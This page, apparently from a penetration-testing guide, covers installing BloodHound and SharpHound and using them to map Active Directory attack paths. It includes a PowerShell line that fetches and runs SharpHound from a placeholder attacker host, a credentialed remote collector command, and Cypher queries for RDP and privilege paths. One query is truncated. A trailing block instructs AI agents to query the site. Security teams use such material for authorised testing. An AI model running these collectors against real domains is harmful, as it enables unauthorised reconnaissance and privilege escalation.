# BloodHound & SharpHound

## Introduction

[BloodHound](https://bloodhound.readthedocs.io/en/latest/index.html) is a graphic interface tool that allows you to map the AD environment visually. An attacker can use BloodHound to quickly identify highly complex attack paths that would otherwise be impossible.

However, prior to any data visualisation, it is required to use [SharpHound](https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html), the official data collector for BloodHound, to detect what domain your current user belongs to, find a domain controller for that domain and gather data like:

* Security group memberships
* Domain trusts
* Abusable rights on Active Directory objects
* Group Policy links
* OU tree structure
* Several properties from computer, group and user objects
* SQL admin links

## Installation & Configuration

In order to install BloodHound on your Kali machine execute the following steps.

1\. Install bloodhound & neo4j

```bash
sudo apt install bloodhound neo4j -y
```

2\. Configure neo4j database: Execute `sudo neo4j console`, access to <http://localhost:7474/> with neo4j default credentials "neo4j:neo4j" and change the default password.&#x20;

3\. Execute `sudo bloodhound` and log in with the new set of credentials.

## Data gathering

There are two ways to obtain the required data to populate BloodHound.

### Local

[Download](https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1) and execute SharpHound. Then, transfer the `*_loop.zip` files into your machine.

```powershell
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/SharpHound.ps1'); Invoke-Bloodhound -CollectionMethod All [-Domain <DOMAIN>] [-OutputDirectory <OUTPUT_DIR>] -ZipFileName loot.zip "
```

### Remote

```bash
pip3 install bloodhound
bloodhound-python -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -ns <NAMESERVER_IP> -d <DOMAIN> -c All
```

Finally, drag and drop the generated files into the BloodHound interface for ingestion, playing with the default queries.

## BloodHound queries

* Find workstations a user can RDP into.

```bash
match p=(g:Group)-[:CanRDP]->(c:Computer) where g.objectid ENDS WITH '-513' AND NOT c.operatingsystem CONTAINS 'Server' return p
```

* Find servers a user can RDP into.

```bash
match p=(g:Group)-[:CanRDP]->(c:Computer) where g.objectid ENDS WITH '-513'
```

* Find what groups can RDP

```bash
MATCH p=(m:Group)-[r:CanRDP]->(n:Computer) RETURN m.name, n.name ORDER BY m.name
```

* Find all the privileges (edges) of the domain users against the domain computers (e.g. CanRDP, AdminTo etc. HasSession edge is not included):

```bash
MATCH p1=shortestPath(((u1:User)-[r1:MemberOf*1..]->(g1:Group))) MATCH p2=(u1)-[*1]->(
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://the-pentesting-guide.marmeus.com/situational_awareness/active-directory/bloodhound-and-sharphound.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.